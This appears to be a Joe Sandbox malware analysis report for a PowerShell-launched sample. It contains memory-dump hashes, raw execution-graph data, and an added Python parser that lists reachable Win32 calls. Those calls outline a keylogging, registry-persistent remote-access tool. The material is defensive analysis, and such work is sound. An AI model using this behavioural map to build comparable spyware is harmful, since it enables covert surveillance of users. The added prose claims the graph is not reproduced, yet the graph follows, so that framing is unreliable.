                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a564fc6724944025aa65a8ccde48b7c0ecaa4c0a95ae4b2f41a61897f41ef9ff
                                                                                                • Instruction ID: dea9805931bd571ab665871169dd6a1f7c6351b48e1f3216d8cc874b13de1efc
                                                                                                • Opcode Fuzzy Hash: a564fc6724944025aa65a8ccde48b7c0ecaa4c0a95ae4b2f41a61897f41ef9ff
                                                                                                • Instruction Fuzzy Hash: 2ED1F771E0952D8BEB68EB54C8A5BE8B3B2FF54305F5042F9D05DA22A5CE746E81CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ca825e31c84d3b6e967d0ea1aa6af1d2f07d0effa53b375edaef79d41e93d77
                                                                                                • Instruction ID: 0d55f5fe1ce8fdb93d408b555e5bc60dc5e30da238df0381511f17cf0838b8d7
                                                                                                • Opcode Fuzzy Hash: 3ca825e31c84d3b6e967d0ea1aa6af1d2f07d0effa53b375edaef79d41e93d77
                                                                                                • Instruction Fuzzy Hash: 95510E70A0995D9FDFA4EF68C8A9BA9BBF1EF59311F1001E9D04DE7261DA346981CF00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b2d6b46a3c15ae451666470577835d721d84f282476c7cf93a03ff90b58b0a9a
                                                                                                • Instruction ID: 6722d1984a07d1d5422e626036884396f015b100d2e7fb139ffe2bec6e7bfe9a
                                                                                                • Opcode Fuzzy Hash: b2d6b46a3c15ae451666470577835d721d84f282476c7cf93a03ff90b58b0a9a
                                                                                                • Instruction Fuzzy Hash: 5E418E71A1964EAFDB55DF98C8A99EDB7F1FF58300F00017AD019E32A1DE346941CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c263fb8cf5929b011a86bd24cf2c0ac40ff35957bc9e185c039f60ed0f44131a
                                                                                                • Instruction ID: e493ca3410b6072927985dc73400879378a1c47363ad61e7a79da2522b4e8b94
                                                                                                • Opcode Fuzzy Hash: c263fb8cf5929b011a86bd24cf2c0ac40ff35957bc9e185c039f60ed0f44131a
                                                                                                • Instruction Fuzzy Hash: 8F310230A1D68E9FDB59DFA8C8A59E9BBF1FF59300F00016ED009D72E2CA346941CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 87338b3adc24cec4319ab21a6b00dc8df59ff02ae362b9414009738e6718f080
                                                                                                • Instruction ID: 700aa909052c406dba8b6693827ed62f0aa3044a749fe089d42c7655c85fc24f
                                                                                                • Opcode Fuzzy Hash: 87338b3adc24cec4319ab21a6b00dc8df59ff02ae362b9414009738e6718f080
                                                                                                • Instruction Fuzzy Hash: BA41E630A19A1D9FDBA5DFA8C8557E977B1FF29301F5140BAD00DE32A1CB346994CB40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a3cab666ffcd524b70a4320a4d6eb24e4c4994f21a349539ab0b8631e9931678
                                                                                                • Instruction ID: d1d13ccaf49dd9e6c238a974903c2847164a4e6a7dadefffbfeffe7c4a1d6cce
                                                                                                • Opcode Fuzzy Hash: a3cab666ffcd524b70a4320a4d6eb24e4c4994f21a349539ab0b8631e9931678
                                                                                                • Instruction Fuzzy Hash: B101A73021CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58AC36A5D732E881CB41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c4a707f4bbd6a3d2f3f53a245bbd41102c56edb2257f5c54971cdd1299a37121
                                                                                                • Instruction ID: 1fbf00e42f184c3b5ce5ac6c06b972ccecd506e2c7cd009e58e5e10be8a68c2e
                                                                                                • Opcode Fuzzy Hash: c4a707f4bbd6a3d2f3f53a245bbd41102c56edb2257f5c54971cdd1299a37121
                                                                                                • Instruction Fuzzy Hash: 0F019670A1952C5FDBA4EB2488A9BA9B7B1EF5A311F9101EA904DE3261DE305E818F00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b8083fab37f98301af50b53c15728b5e60fce93f221dc16479beec1e26dd48b3
• Instruction ID: 7533dcbe54ce5595cfd52cef4c4ceeba69f7854e93b1ef62791e3661097958cf
• Opcode Fuzzy Hash: b8083fab37f98301af50b53c15728b5e60fce93f221dc16479beec1e26dd48b3
• Instruction Fuzzy Hash: 8BF03C34E1D10A9BDB28DA94C8A58BEB7B2EF98310F11412DC00AA3291DE346A42CB80

Memory Dump Source
• Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c6d57ed630333aa8eab5fd31717cfe3f6d8bbc11ffe8065dd2b487560055e71
• Instruction ID: bae328919febbb6cc948eff8d7a49c51824986c49e001e2aa3a71794e8be8c85
• Opcode Fuzzy Hash: 3c6d57ed630333aa8eab5fd31717cfe3f6d8bbc11ffe8065dd2b487560055e71
• Instruction Fuzzy Hash: 9CD06C36A0882DDF8F60EBD898485ECB7B0FB68352B000126E509E7204D730A9518B50

Memory Dump Source
• Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9def1f4250a8490c584c98e2b9674fef1e8f4313306c59df24aa7b3adad799f0
• Instruction ID: 49b5a0380abb288e1ea99d727aa82f72ab58154f69ce7bdc29bfd1cdd9bb494d
• Opcode Fuzzy Hash: 9def1f4250a8490c584c98e2b9674fef1e8f4313306c59df24aa7b3adad799f0
• Instruction Fuzzy Hash: 3512F870A19A1D9FDBA4DF98C494BA977F1FF68301F1140BAD00DD72A5DB34AA85CB40

Memory Dump Source
• Source File: 00000003.00000002.1950331337.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9ba40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 86ff743f4660bf96ffa6604bbff0d35c73473861dc32de7b03eebce5fa250f31
• Instruction ID: 351d086b7397d7cbb159e9060d3a55212aa5d0ea52f6fb2cfac3a05a9199766c
• Opcode Fuzzy Hash: 86ff743f4660bf96ffa6604bbff0d35c73473861dc32de7b03eebce5fa250f31
• Instruction Fuzzy Hash: 1111AC2290F6D64FD7238B744C765A47FB1AF53644B0E41FFD098CA1E3D5481909C362

Memory Dump Source
• Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 492a75d228d0c5618727893404d7c1d9aae841825d8f7c1f9135e1fc8c21ba01
• Instruction ID: 664234a1ca55e0b9ac146f84658f5a5b2cf47a1ea87e825a55c8169fc5020a0b
• Opcode Fuzzy Hash: 492a75d228d0c5618727893404d7c1d9aae841825d8f7c1f9135e1fc8c21ba01
• Instruction Fuzzy Hash: E8217C6094E3C96FD7138BA488746E87FB0AF03310F0A45EBC495CB0E3DA685A09C712

Memory Dump Source
• Source File: 00000003.00000002.1949546706.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27c015146e1ead5c67c34ac45ae684557cea83dbb0e52961c6848c06c818bf9f
• Instruction ID: d6fc842a6b4dcd3ea509244616d916d542f7072763e1a07620a0343527d7790c
• Opcode Fuzzy Hash: 27c015146e1ead5c67c34ac45ae684557cea83dbb0e52961c6848c06c818bf9f
• Instruction Fuzzy Hash: 4C01D430A5E28D9FE7269B60D860AF977B0EB42301F050177D405D71F6DA7C6709C755

Memory Dump Source
• Source File: 00000006.00000002.1804510036.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd9b9b0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
• Instruction ID: 03cfe8d71f9e02545cdf0009c6c0a79b5e4b07bfbfde32343fac69daf1e17f34
• Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
• Instruction Fuzzy Hash: 9101A77021CB0C4FD748EF0CE051AA6B3E0FB85320F10056EE58AC36A1D632E882CB41

Execution Graph

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.3%
Total number of Nodes: 1286
Total number of Limit Nodes: 36
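The execution_graph data of this section is the text form of the rendered graph: each node is a numeric id, the function's address, and optional labels naming the Win32 or CRT calls that function makes, while each `src->dst` token is an edge. Parsing that text answers a question the graph viewer does not, namely which of the interesting API calls are reachable from a chosen function node. The Python below is an added example, not code from the report or from Joe Sandbox. The node-id and address patterns, the treatment of labels, and the list of APIs of interest are assumptions derived from this dump, and the sample input is a constructed excerpt: its node and edge tokens were copied from the report, but only a hand-picked subset of edges is included, so it is not a faithful subgraph of the real analysis.

```python
"""Parse a Joe Sandbox execution_graph dump and list the Win32 calls reachable
from a chosen node.  Added example, not code from the report or from Joe Sandbox."""
import re
from collections import defaultdict, deque

# Constructed excerpt: node and edge tokens copied from this report's
# execution_graph dump, with only a hand-picked subset of the edges.
SAMPLE = (
    "execution_graph 46615 43bea8 46617 43beb4 _swprintf CallCatchBlock 46615->46617 "
    "46616 43bec2 46631 44062d 20 API calls _Atexit 46616->46631 46617->46616 "
    "46619 43beec 46617->46619 46626 445909 EnterCriticalSection 46619->46626 "
    "46681 40ea00 47043 41cbe1 LoadLibraryA GetProcAddress 46681->47043 "
    "46683 40ea1c GetModuleFileNameW 47043->46683 "
    "47134 40d0ae CreateMutexA GetLastError 46683->47134"
)

# Assumption: node ids in the dump are 5-digit decimals and function addresses
# are 6 lowercase hex digits.  Requiring an address right after an id is what
# keeps the "20" in "20 API calls" from being taken for a node id.
NODE_ID = re.compile(r"^\d{5}$")
ADDR = re.compile(r"^[0-9a-f]{6}$")
EDGE = re.compile(r"^(\d{5})->(\d{5})$")

# Calls worth a breakpoint, chosen by hand from the labels in this report.
APIS_OF_INTEREST = frozenset({
    "LoadLibraryA", "GetProcAddress", "GetModuleFileNameW", "CreateMutexA",
    "CreateProcessA", "CreateThread", "RegOpenKeyExA", "RegCreateKeyA",
    "RegSetValueExA", "WSAStartup", "connect", "SetProcessDEPPolicy",
    "DeleteFileW", "GetComputerNameExW", "GetUserNameW",
})


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, [labels]);
    edges is a list of (src, dst) id pairs in dump order."""
    tokens = text.split()
    nodes, edges, current = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((edge.group(1), edge.group(2)))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = tok                       # new node: id followed by address
            nodes[current] = (tokens[i + 1], [])
            i += 2
        else:
            if current is not None and tok != "execution_graph":
                nodes[current][1].append(tok)   # any other token labels the open node
            i += 1
    return nodes, edges


def api_call_sites(text, apis=APIS_OF_INTEREST):
    """Map each API of interest to the (node id, address) pairs whose label names it."""
    nodes, _ = parse_graph(text)
    sites = defaultdict(list)
    for nid, (addr, labels) in nodes.items():
        for label in labels:
            if label in apis:
                sites[label].append((nid, addr))
    return dict(sites)


def reachable(edges, start):
    """Set of node ids reachable from start by following src->dst edges (BFS)."""
    adj = defaultdict(list)
    for src, dst in edges:
        adj[src].append(dst)
    seen, queue = {start}, deque([start])
    while queue:
        for dst in adj[queue.popleft()]:
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return seen


def reachable_apis(text, start, apis=APIS_OF_INTEREST):
    """Sorted names of APIs of interest labelled on any node reachable from start."""
    nodes, edges = parse_graph(text)
    found = set()
    for nid in reachable(edges, start):
        _addr, labels = nodes.get(nid, ("", []))
        found.update(label for label in labels if label in apis)
    return sorted(found)


if __name__ == "__main__":
    for api, where in sorted(api_call_sites(SAMPLE).items()):
        print(api, where)
    print("from 46681:", reachable_apis(SAMPLE, "46681"))
```

Feed `parse_graph` the whole execution_graph text of a report rather than an excerpt; the only format assumption that matters is that a node id is always immediately followed by its address, which is what lets the parser skip over counts such as "28 API calls" inside labels. The addresses returned by `api_call_sites` are the ones to set breakpoints on when re-running the sample under a debugger.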
execution_graph: node/edge data of the rendered execution graph (node id, function address, call labels, and src->dst edges), which is not readable as text and is not reproduced here. Win32 calls labelled on the graph's nodes include: module loading and resolution (LoadLibraryA and GetProcAddress at 41cbe1, GetModuleHandleA/W, GetModuleFileNameW at 40ea1c); CRT startup and fail-fast handling (IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetStartupInfoW); mutex creation (CreateMutexA and GetLastError at 40d0ae); process creation (CreateProcessA and CloseHandle at 407790); registry access (RegOpenKeyExA at 413584, RegOpenKeyExW at 413a5e, RegQueryValueExA, RegCreateKeyA at 4137aa, RegSetValueExA and RegCloseKey at 4137d5, RegDeleteValueW at 413a7a); resource loading (FindResourceA at 41b539; LoadResource, LockResource and SizeofResource at 41b556); threads and timing (CreateThread, WaitForSingleObject, Sleep, GetTickCount); host and locale information (GetComputerNameExW and GetUserNameW at 41b69e, GetLocalTime at 41b596, GetLocaleInfoA at 40f90c, GetLongPathNameW at 40dbd4); SetProcessDEPPolicy at 40f27b; DeleteFileW at 40f381; heap and console helpers (RtlAllocateHeap, GetStdHandle, GetFileType, RaiseException); and networking (WSAStartup at 40489e, connect at 4048c8, WSAGetLastError at 4151c7).
47595->47596 47597 402629 47595->47597 47603 4028a4 22 API calls 47596->47603 47600 4028e8 28 API calls 47597->47600 47601 40263b 47597->47601 47600->47601 47601->47592 47605 40268b 47604->47605 47606 4023ce 11 API calls 47605->47606 47607 40208d 47606->47607 47607->47116 47608->47124 47609->47129 47612 41b362 47611->47612 47613 41c055 GetCurrentProcess 47611->47613 47614 4135e1 RegOpenKeyExA 47612->47614 47613->47612 47615 41360f RegQueryValueExA RegCloseKey 47614->47615 47616 413639 47614->47616 47615->47616 47617 402093 28 API calls 47616->47617 47618 41364e 47617->47618 47618->47140 47619->47148 47621 40b947 47620->47621 47626 402252 47621->47626 47623 40b952 47630 40b967 47623->47630 47625 40b961 47625->47159 47627 4022ac 47626->47627 47628 40225c 47626->47628 47627->47623 47628->47627 47637 402779 11 API calls std::_Deallocate 47628->47637 47631 40b9a1 47630->47631 47632 40b973 47630->47632 47649 4028a4 22 API calls 47631->47649 47638 4027e6 47632->47638 47636 40b97d 47636->47625 47637->47627 47639 4027ef 47638->47639 47640 402851 47639->47640 47641 4027f9 47639->47641 47651 4028a4 22 API calls 47640->47651 47644 402802 47641->47644 47646 402815 47641->47646 47650 402aea 28 API calls __EH_prolog 47644->47650 47647 402813 47646->47647 47648 402252 11 API calls 47646->47648 47647->47636 47648->47647 47650->47647 47652->47168 47654 402347 47653->47654 47655 402252 11 API calls 47654->47655 47656 4023c7 47655->47656 47656->47168 47658 4024f9 47657->47658 47659 40250a 28 API calls 47658->47659 47660 4020b1 47659->47660 47660->46830 47677 43ba8a 47661->47677 47663 43aed0 47683 43a837 36 API calls 3 library calls 47663->47683 47665 43ae95 47665->47663 47666 43aeaa 47665->47666 47668 43aeaf __cftoe 47665->47668 47682 44062d 20 API calls _Atexit 47666->47682 47668->47197 47670 43aedc 47673 43af0b 47670->47673 47684 43bacf 40 API calls __Tolower 47670->47684 47671 43af77 47686 43ba36 20 API calls 2 library calls 47671->47686 47673->47671 47685 43ba36 20 API calls 2 
library calls 47673->47685 47675 43b03e _swprintf 47675->47668 47687 44062d 20 API calls _Atexit 47675->47687 47678 43baa2 47677->47678 47679 43ba8f 47677->47679 47678->47665 47688 44062d 20 API calls _Atexit 47679->47688 47681 43ba94 __cftoe 47681->47665 47682->47668 47683->47670 47684->47670 47685->47671 47686->47675 47687->47668 47688->47681 47695 401fb0 47689->47695 47691 402f1e 47692 402055 11 API calls 47691->47692 47693 402f2d 47692->47693 47693->47211 47694->47214 47696 4025f0 28 API calls 47695->47696 47697 401fbd 47696->47697 47697->47691 47699 40a162 47698->47699 47700 413584 3 API calls 47699->47700 47701 40a169 47700->47701 47702 40a197 47701->47702 47703 40a17d 47701->47703 47719 409097 47702->47719 47704 40a182 47703->47704 47705 409ed6 47703->47705 47707 409097 28 API calls 47704->47707 47705->46882 47709 40a190 47707->47709 47747 40a268 29 API calls 47709->47747 47712 40a195 47712->47705 47713->47238 47895 403222 47714->47895 47716 403022 47899 403262 47716->47899 47720 4090ad 47719->47720 47721 402252 11 API calls 47720->47721 47722 4090c7 47721->47722 47748 404267 47722->47748 47724 4090d5 47725 40a1b4 47724->47725 47760 40b927 47725->47760 47728 40a205 47731 402093 28 API calls 47728->47731 47729 40a1dd 47730 402093 28 API calls 47729->47730 47732 40a1e7 47730->47732 47733 40a210 47731->47733 47734 41bcef 28 API calls 47732->47734 47735 402093 28 API calls 47733->47735 47736 40a1f5 47734->47736 47737 40a21f 47735->47737 47764 40b19f 31 API calls new 47736->47764 47739 41b580 80 API calls 47737->47739 47740 40a224 CreateThread 47739->47740 47742 40a24b CreateThread 47740->47742 47743 40a23f CreateThread 47740->47743 47772 40a2b8 47740->47772 47741 40a1fc 47744 401fd8 11 API calls 47741->47744 47745 401f09 11 API calls 47742->47745 47769 40a2c4 47742->47769 47743->47742 47766 40a2a2 47743->47766 47744->47728 47746 40a25f 47745->47746 47746->47705 47747->47712 47894 40a2ae 163 API calls 47747->47894 47749 402888 22 API calls 47748->47749 47750 
40427b 47749->47750 47751 404290 47750->47751 47752 4042a5 47750->47752 47758 4042df 22 API calls 47751->47758 47754 4027e6 28 API calls 47752->47754 47757 4042a3 47754->47757 47755 404299 47759 402c48 22 API calls 47755->47759 47757->47724 47758->47755 47759->47757 47761 40b930 47760->47761 47762 40a1d2 47760->47762 47765 40b9a7 28 API calls 47761->47765 47762->47728 47762->47729 47764->47741 47765->47762 47775 40a2f3 47766->47775 47805 40ad11 47769->47805 47847 40a761 47772->47847 47776 40a30c GetModuleHandleA SetWindowsHookExA 47775->47776 47777 40a36e GetMessageA 47775->47777 47776->47777 47780 40a328 GetLastError 47776->47780 47778 40a380 TranslateMessage DispatchMessageA 47777->47778 47779 40a2ab 47777->47779 47778->47777 47778->47779 47790 41bc1f 47780->47790 47796 441ed1 47790->47796 47793 402093 28 API calls 47794 40a339 47793->47794 47795 4052fd 28 API calls 47794->47795 47797 441edd 47796->47797 47800 441ccd 47797->47800 47799 41bc43 47799->47793 47801 441ce4 47800->47801 47803 441d1b __cftoe 47801->47803 47804 44062d 20 API calls _Atexit 47801->47804 47803->47799 47804->47803 47834 40ad1f 47805->47834 47806 40a2cd 47807 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 47808 40b93f 28 API calls 47807->47808 47808->47834 47813 41bb77 GetTickCount 47813->47834 47814 40adbf GetWindowTextW 47814->47834 47816 401f09 11 API calls 47816->47834 47817 40b927 28 API calls 47817->47834 47818 40af17 47819 401f09 11 API calls 47818->47819 47819->47806 47820 40ae84 Sleep 47820->47834 47821 441ed1 20 API calls 47821->47834 47823 402093 28 API calls 47823->47834 47824 40ae0c 47826 409097 28 API calls 47824->47826 47824->47834 47843 40b19f 31 API calls new 47824->47843 47826->47824 47828 403014 28 API calls 47828->47834 47829 406383 28 API calls 47829->47834 47831 40a671 12 API calls 47831->47834 47832 41bcef 28 API calls 47832->47834 47833 401fd8 11 API calls 47833->47834 47834->47806 47834->47807 47834->47813 47834->47814 47834->47816 47834->47817 47834->47818 
47834->47820 47834->47821 47834->47823 47834->47824 47834->47828 47834->47829 47834->47831 47834->47832 47834->47833 47835 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 47834->47835 47836 401f86 47834->47836 47840 434801 23 API calls __onexit 47834->47840 47841 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 47834->47841 47842 40907f 28 API calls 47834->47842 47844 40b9b7 28 API calls 47834->47844 47845 40b783 40 API calls 2 library calls 47834->47845 47846 4052fd 28 API calls 47834->47846 47837 401f8e 47836->47837 47838 402252 11 API calls 47837->47838 47839 401f99 47838->47839 47839->47834 47840->47834 47841->47834 47842->47834 47843->47824 47844->47834 47845->47834 47848 40a776 Sleep 47847->47848 47868 40a6b0 47848->47868 47850 40a2c1 47851 40a7b6 CreateDirectoryW 47857 40a788 47851->47857 47852 40a7c7 GetFileAttributesW 47852->47857 47853 401e65 22 API calls 47853->47857 47854 40a7de SetFileAttributesW 47854->47857 47855 4020df 11 API calls 47866 40a829 47855->47866 47857->47848 47857->47850 47857->47851 47857->47852 47857->47853 47857->47854 47857->47866 47881 41c482 47857->47881 47858 40a858 PathFileExistsW 47858->47866 47860 4020b7 28 API calls 47860->47866 47861 40a961 SetFileAttributesW 47861->47857 47862 401fd8 11 API calls 47862->47866 47863 401fe2 28 API calls 47863->47866 47864 406e13 28 API calls 47864->47866 47866->47855 47866->47858 47866->47860 47866->47861 47866->47862 47866->47863 47866->47864 47867 401fd8 11 API calls 47866->47867 47891 41c516 32 API calls 47866->47891 47892 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 47866->47892 47867->47857 47869 40a75d 47868->47869 47871 40a6c6 47868->47871 47869->47857 47870 40a6e5 CreateFileW 47870->47871 47872 40a6f3 GetFileSize 47870->47872 47871->47870 47873 40a728 CloseHandle 47871->47873 47874 40a73a 47871->47874 47875 40a716 47871->47875 47876 40a71d Sleep 47871->47876 47872->47871 47872->47873 
47873->47871 47874->47869 47878 409097 28 API calls 47874->47878 47893 40b117 84 API calls 47875->47893 47876->47873 47879 40a756 47878->47879 47880 40a1b4 124 API calls 47879->47880 47880->47869 47883 41c495 CreateFileW 47881->47883 47884 41c4d2 47883->47884 47885 41c4ce 47883->47885 47886 41c4f2 WriteFile 47884->47886 47887 41c4d9 SetFilePointer 47884->47887 47885->47857 47889 41c505 47886->47889 47890 41c507 CloseHandle 47886->47890 47887->47886 47888 41c4e9 CloseHandle 47887->47888 47888->47885 47889->47890 47890->47885 47891->47866 47892->47866 47893->47876 47896 40322e 47895->47896 47905 403618 47896->47905 47898 40323b 47898->47716 47900 40326e 47899->47900 47901 402252 11 API calls 47900->47901 47902 403288 47901->47902 47903 402336 11 API calls 47902->47903 47904 403031 47903->47904 47904->47243 47906 403626 47905->47906 47907 403644 47906->47907 47908 40362c 47906->47908 47910 40365c 47907->47910 47911 40369e 47907->47911 47916 4036a6 28 API calls 47908->47916 47914 4027e6 28 API calls 47910->47914 47915 403642 47910->47915 47917 4028a4 22 API calls 47911->47917 47914->47915 47915->47898 47916->47915 47919 404186 47918->47919 47920 402252 11 API calls 47919->47920 47921 404191 47920->47921 47929 4041bc 47921->47929 47924 4042fc 47940 404353 47924->47940 47926 40430a 47927 403262 11 API calls 47926->47927 47928 404319 47927->47928 47928->47252 47930 4041c8 47929->47930 47933 4041d9 47930->47933 47932 40419c 47932->47924 47934 4041e9 47933->47934 47935 404206 47934->47935 47936 4041ef 47934->47936 47937 4027e6 28 API calls 47935->47937 47938 404267 28 API calls 47936->47938 47939 404204 47937->47939 47938->47939 47939->47932 47941 40435f 47940->47941 47944 404371 47941->47944 47943 40436d 47943->47926 47945 40437f 47944->47945 47946 404385 47945->47946 47947 40439e 47945->47947 48008 4034e6 28 API calls 47946->48008 47948 402888 22 API calls 47947->47948 47949 4043a6 47948->47949 47951 404419 47949->47951 47952 4043bf 47949->47952 48009 4028a4 22 API calls 
47951->48009 47954 4027e6 28 API calls 47952->47954 47964 40439c 47952->47964 47954->47964 47964->47943 48008->47964 48016 43ab1a 48010->48016 48014 4138ca RegSetValueExA RegCloseKey 48013->48014 48015 4138f4 48013->48015 48014->48015 48015->47268 48019 43aa9b 48016->48019 48018 40170d 48018->47270 48020 43aaaa 48019->48020 48021 43aabe 48019->48021 48025 44062d 20 API calls _Atexit 48020->48025 48023 43aaaf __alldvrm __cftoe 48021->48023 48026 4489d7 11 API calls 2 library calls 48021->48026 48023->48018 48025->48023 48026->48023 48030 41b98a ctype ___scrt_fastfail 48027->48030 48028 402093 28 API calls 48029 414f84 48028->48029 48029->47277 48030->48028 48031->47294 48033 414f33 48032->48033 48034 414f3d getaddrinfo WSASetLastError 48032->48034 48200 414dc1 29 API calls ___std_exception_copy 48033->48200 48034->47322 48036 414f38 48036->48034 48038 404846 socket 48037->48038 48039 404839 48037->48039 48041 404860 CreateEventW 48038->48041 48042 404842 48038->48042 48201 40489e WSAStartup 48039->48201 48041->47322 48042->47322 48043 40483e 48043->48038 48043->48042 48045 404fea 48044->48045 48046 404f65 48044->48046 48045->47322 48047 404f6e 48046->48047 48048 404fc0 CreateEventA CreateThread 48046->48048 48049 404f7d GetLocalTime 48046->48049 48047->48048 48048->48045 48203 405150 48048->48203 48050 41bc1f 28 API calls 48049->48050 48051 404f91 48050->48051 48202 4052fd 28 API calls 48051->48202 48060 404a1b 48059->48060 48061 4048ee 48059->48061 48062 40497e 48060->48062 48063 404a21 WSAGetLastError 48060->48063 48061->48062 48065 40531e 28 API calls 48061->48065 48085 404923 48061->48085 48062->47322 48063->48062 48064 404a31 48063->48064 48066 404932 48064->48066 48067 404a36 48064->48067 48070 40490f 48065->48070 48073 402093 28 API calls 48066->48073 48212 41cb72 30 API calls 48067->48212 48069 40492b 48069->48066 48072 404941 48069->48072 48074 402093 28 API calls 48070->48074 48082 404950 48072->48082 48083 404987 48072->48083 48076 404a80 48073->48076 
